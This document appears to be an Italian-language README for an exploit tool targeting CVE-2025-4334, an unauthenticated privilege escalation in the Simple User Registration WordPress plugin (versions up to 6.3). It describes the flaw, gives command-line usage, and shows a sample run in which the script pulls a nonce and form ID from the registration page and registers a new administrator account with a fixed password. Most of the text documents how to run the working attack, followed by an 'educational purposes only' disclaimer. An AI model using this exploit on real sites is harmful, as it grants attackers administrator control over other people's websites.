
Simple User Registration <= 6.3 - Escalation dei Privilegi non Autenticata
Il plugin Simple User Registration per WordPress è vulnerabile all'Escalata dei Privilegi in tutte le versioni fino alla 6.3 inclusa.
Ciò è dovuto a insufficienti restrizioni sui metadati utente che possono essere forniti durante la registrazione.
Questo consente a attaccanti non autenticati di registrarsi come amministratori.
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:HL'exploit automatizza l'escalata dei privilegi tramite invio di modulo utilizzando un nonce estratto, un ID del modulo e un referer.
python CVE-2025-4334.py -h
usage: CVE-2025-4334.py [-h] -u URL --form FORM
Simple User Registration <= 6.3 - Escalata dei Privilegi Non Autenticata - by Khaled Alenazi (Nxploited)
opzioni:
-h, --help mostra questo messaggio di aiuto ed esce
-u, --url URL URL base di WordPress (es. http://localhost/wordpress/)
--form FORM URL completo della pagina che contiene il modulo di registrazione
-u → Installazione base di WordPress (es. http://localhost/wordpress/)--form → URL completo del modulo di registrazione vulnerabile (es. http://localhost/wpr/default-registration/)python CVE-2025-4334.py -u http://localhost/wordpress/ --form http://localhost/wpr/default-registration/
[i] Nonce estratto : ffcf0140a8
[i] ID Modulo estratto : 76
[i] Percorso Referer : /wpr/default-registration/
[i] Codice Risposta HTTP : 200
[i] Risposta Server : {"user_id":13,"status":"success","signup":"signup","message":"Registration Done !\r\nUser Register Email not sent, please contact admin","redirect_url_signup":null}
[+] Exploit Riuscito
[+] Nome Utente : Nxploitedadmin
[+] Nome : Nxploitedadmin
[+] Cognome : Nxploitedadmin
[+] Email : [email protected]
[+] Password : nxp1234
[+] Ruolo : administrator
Exploit By : Khaled_alenazi (Nxploited)
Questo script è fornito esclusivamente a scopo educativo e di ricerca.
L'autore non è responsabile per qualsiasi uso improprio o danno causato da questo strumento.
By: Khaled_alenazi (Nxploited)